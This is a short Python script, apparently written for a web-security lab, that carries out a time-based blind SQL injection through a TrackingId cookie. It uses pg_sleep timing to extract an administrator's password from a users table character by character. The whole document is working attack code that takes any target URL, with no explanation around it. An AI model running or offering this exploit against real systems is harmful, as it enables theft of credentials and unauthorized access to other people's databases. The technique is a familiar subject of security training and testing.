Blind Injection Sample Script

import sys
import requests
import urllib3
import urllib
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
def sqli_password(url):
   password_extracted = ""
   for i in range(1,21):
       for j in range(32,126):
           sql_payload = "' || (select case when (username='administrator' and ascii(substring(password,%s,1))='%s') then pg_sleep(10) else pg_sleep(-1) end from users)--" %(i,j)
           sql_payload_encoded = urllib.parse.quote(sql_payload)
           cookies = {'TrackingId': 'N9U1b0pBRm2A4TUP' + sql_payload_encoded, 'session': 'QDQ6w9c8kVejHXxHONeBM16uK6k8xOBW'}
           r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)
           if int(r.elapsed.total_seconds()) > 9:
               password_extracted += chr(j)
               sys.stdout.write('\r' + password_extracted)
               sys.stdout.flush()
               break
           else:
               sys.stdout.write('\r' + password_extracted + chr(j))
               sys.stdout.flush()

def main():
   if len(sys.argv) != 2:
       print("(+) Usage: %s <url>" % sys.argv[0])
       print("(+) Example: %s www.example.com" % sys.argv[0])
       sys.exit(-1)
   url = sys.argv[1]
   print("(+) Retreiving administrator password...")
   sqli_password(url)
if __name__ == "__main__":
   main()

Last updated